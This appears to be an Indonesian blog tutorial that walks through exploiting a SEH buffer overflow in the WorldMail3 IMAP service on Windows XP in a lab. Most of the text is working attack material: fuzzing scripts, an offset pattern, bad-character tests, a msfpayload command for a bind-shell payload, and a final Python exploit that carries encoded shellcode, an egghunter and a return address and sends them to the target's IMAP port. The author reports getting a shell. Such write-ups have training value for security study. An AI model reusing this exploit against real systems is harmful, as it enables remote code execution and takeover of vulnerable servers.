Hal-hal yang perlu di persiapkan adalah :
- 2 OS yang berisi masing-masing VM Kali Linux ( sebagai attacker) dan VM Windows XP SP3 ( sebagai korban )
- Immunity Debugger
- aplikasi WorldMail3.exe, untuk software nya bisa di googling ya :D
- contoh penampakan software WorldMail3.exe
- sedikit pemahaman tentang python di perlukan :D
- software WorldMail3 di debug menggunakan immunity, dg cara di attach,
- jika crash, start service nya dari menu services di windows
Langkah pertama:
Kita mencoba untuk mengirimkan suatu string "}" sebanyak-banyaknya sampai aplikasi tersebut mengalami crash, dalam contoh aplikasi ini saya akan mengirimkan sebanyak 1500.
Script yang di gunakan seperti berikut:
#!/usr/bin/pythonDan ternyata aplikasi mengalami crash, seperti pada gambar di bawah ini.
import socket
host = "10.7.9.246"
port = 143
def fuzz(payload):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('a001 LIST ' + payload + '\r\n')
print s.recv(1024)
s.shutdown
s.close
command = "}" * 1500
fuzz(command)
Langkah kedua:
Setelah aplikasi mengalami crash di string "}" sebanyak 1500, sekarang kita akan membuat pattern string sebanyak 1500 juga, dengan menggunakan cara yang sama di eksperimen sebelumnya ;)
Langkah ketiga:
Edit script sebelumnya dengan menambahkan string dari langkah kedua, seperti berikut ini:
#!/usr/bin/pythonDan ternyata aplikasi mengalami crash, tapi tidak seperti eksperimen kita sebelum nya :(
import socket
host = '10.7.9.246'
port = 143
def fuzz(payload):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('a001 LIST ' + payload + '\r\n')
print s.recv(1024)
s.shutdown
s.close
command = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9"
command += "}"
fuzz(command)
Jadi untuk melihat hasil crash nya, ada perlakuan khusus untuk kasus ini. Dari Immunity Debugger pilih menu View > SEH chain, seperti pada gambar di bawah ini
Kemudian klik kanan di value "41387A41", pilih Follow address in stack, maka baru bisa terlihat crash nya, seperti pada gambar di bawah ini. Di sini kita fokus di bagian "Pointer to next SEH record " dan "SE handler", seperti pada gambar di bawah ini:
Langkah keempat:
Sekarang kita perlu mengetahui posisi "Pointer to next SEH record " dan "SE handler" berada di mana dengan menggunakan perintah seperti pada gambar di bawah ini:
Langkah kelima:
Saat nya kita coba lagi dengan lebih detil jumlah string yang harus di kirim kan sesuai dengan hasil di atas ;) Kemudian kita belajar untuk mengetahui apa saja karakter yang di larang, agar saat membuat payload shell tidak menjadi masalah ;)
Untuk buat script generate karakternya, bisa cek di sini
Edit script sebelumnya dengan menambahkan detil informasi yang kita dapat dari proses sebelumnya, seperti berikut:
#!/usr/bin/pythonDan ternyata hasil nya masih ada keanehan, berarti kita harus uji coba dengan menghapus karakter dari hasil generate ./a.out.
import socket
host = '10.7.9.246'
port = 143
def fuzz(payload):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('a001 LIST ' + payload + '\r\n')
print s.recv(1024)
s.shutdown
s.close
offsets = {
'NXT': 770,
'SEH':774
}
command = "A" * 292
command += "B" * 4 # selanjutnya di isi jmp short 6 bytes
command += "C" * 4 # selanjutnya di isi alamat memory POP POP RETN
command += "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"command += "}"
fuzz(command)
Sekarang kita coba hapus karakter "\x00", kemudian jalankan script tersebut. Dan akhirnya karakter yang muncul sudah teratur, seperti pada gambar berikut ini:
Berikut nya kita mencari alamat memory yang berisi POP POP RETN di file dll ini yang sifat nya tidak safe. Kita menggunakan script pvefindaddr.py, cara menjalankan nya di Immunity, pilih View > Log, ketik !pvefindaddr nosafeseh, tunggu sampai proses selesai. Dari sini kita akan mendapatkan info SEH yang tidak safe, termasuk target kita, seperti gambar di bawah ini:
Berikut nya kita pilih View > Executables modules, klik file dll yang tidak safe tersebut (MFldrMgr.dll). Kemudian klik kanan di area kolom pojok kiri atas, pilih Search for > Sequence of commands, kemudian input seperti ini:
Tekan Ctrl+L untuk mencari alamat POP POP RETN yang lain dan memang ternyata ada banyak. Ambil salah satu nya saja tapi yang tidak mengandung karakter yang di larang, kita ambil contoh seperti gambar berikut:
Sekarang saat nya membuat payload shell nya dan jangan lupa pastikan payload shell kita tidak terdapat karakter yang di larang tersebut.
Langkah keenam:
Kita buat payload shell di Kali Linux dengan menggunakan perintah berikut:
msfpayload windows/shell_bind_tcp EXITFUNC=seh R | msfencode -a x86 -b "\x00" -t cKemudian edit script kita, untuk menambahkan script payload shell tersebut, seperti berikut:
#!/usr/bin/pythonSelanjutnya kita perhatikan apakah script kita sudah berhasil masuk di memory, dengan menggunakan immunity, ternyata lengkap sudah script nya masuk ke memory, tinggal uji coba mendapatkan shell nya
import socket
host = '10.7.9.246'
port = 143
def fuzz(payload):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('a001 LIST ' + payload + '\r\n')
print s.recv(1024)
s.shutdown
s.close
offsets = {
'NXT': 770,
'SEH':774
}
# utk penanda mencari suatu string yg kita cari
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
stringnya = "w00tw00t"
# 368 bytes
shellcode = stringnya + ("\xda\xc0\xb8\xce\x1e\xeb\x77\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x56\x83\xc2\x04\x31\x42\x14\x03\x42\xda\xfc\x1e\x8b\x0a\x89"
"\xe1\x74\xca\xea\x68\x91\xfb\x38\x0e\xd1\xa9\x8c\x44\xb7\x41"
"\x66\x08\x2c\xd2\x0a\x85\x43\x53\xa0\xf3\x6a\x64\x04\x3c\x20"
"\xa6\x06\xc0\x3b\xfa\xe8\xf9\xf3\x0f\xe8\x3e\xe9\xff\xb8\x97"
"\x65\xad\x2c\x93\x38\x6d\x4c\x73\x37\xcd\x36\xf6\x88\xb9\x8c"
"\xf9\xd8\x11\x9a\xb2\xc0\x1a\xc4\x62\xf0\xcf\x16\x5e\xbb\x64"
"\xec\x14\x3a\xac\x3c\xd4\x0c\x90\x93\xeb\xa0\x1d\xed\x2c\x06"
"\xfd\x98\x46\x74\x80\x9a\x9c\x06\x5e\x2e\x01\xa0\x15\x88\xe1"
"\x50\xfa\x4f\x61\x5e\xb7\x04\x2d\x43\x46\xc8\x45\x7f\xc3\xef"
"\x89\x09\x97\xcb\x0d\x51\x4c\x75\x17\x3f\x23\x8a\x47\xe7\x9c"
"\x2e\x03\x0a\xc9\x49\x4e\x43\x3e\x64\x71\x93\x28\xff\x02\xa1"
"\xf7\xab\x8c\x89\x70\x72\x4a\xed\xab\xc2\xc4\x10\x53\x33\xcc"
"\xd6\x07\x63\x66\xfe\x27\xe8\x76\xff\xf2\xbf\x26\xaf\xac\x7f"
"\x97\x0f\x1c\xe8\xfd\x9f\x43\x08\xfe\x75\xf2\x0e\x30\xad\x57"
"\xf9\x31\x51\x46\xa5\xbc\xb7\x02\x45\xe9\x60\xba\xa7\xce\xb8"
"\x5d\xd7\x24\x95\xf6\x4f\x70\xf3\xc0\x70\x81\xd1\x63\xdc\x29"
"\xb2\xf7\x0e\xee\xa3\x08\x1b\x46\xad\x31\xcc\x1c\xc3\xf0\x6c"
"\x20\xce\x62\x0c\xb3\x95\x72\x5b\xa8\x01\x25\x0c\x1e\x58\xa3"
"\xa0\x39\xf2\xd1\x38\xdf\x3d\x51\xe7\x1c\xc3\x58\x6a\x18\xe7"
"\x4a\xb2\xa1\xa3\x3e\x6a\xf4\x7d\xe8\xcc\xae\xcf\x42\x87\x1d"
"\x86\x02\x5e\x6e\x19\x54\x5f\xbb\xef\xb8\xee\x12\xb6\xc7\xdf"
"\xf2\x3e\xb0\x3d\x63\xc0\x6b\x86\x9d\x30\xa1\x13\x09\xeb\x50"
"\x5e\x57\x0c\x8f\x9d\x6e\x8f\x25\x5e\x95\x8f\x4c\x5b\xd1\x17"
"\xbd\x11\x4a\xf2\xc1\x86\x6b\xd7")
command = shellcode
command += "\x90" * (offsets['NXT'] - len(shellcode)) # nop sleed
command += "\xeb\x06\x90\x90" # jmp short 6 bytes
command += "\xde\x56\x04\x60" # salah satu alamat memory POP POP RETN
command += "\x90" * 8 # nop sleed
command += egghunter
command += "\x90" * (80-len(egghunter))
command += "}"
fuzz(command)
Selanjutnya kita perlu uji coba script tersebut, jika memang aplikasi tidak crash, harus nya kita sudah mendapatkan shell nya, dan ternyata kita berhasil mendapatkan shellnya, berikut uji coba nya:
Note:
Sebagai latihan, bisa mencoba dengan menggunakan OS Windows yang lain nya, untuk mengetahui perbedaan nya seperti apa ;)
Tidak ada komentar:
Posting Komentar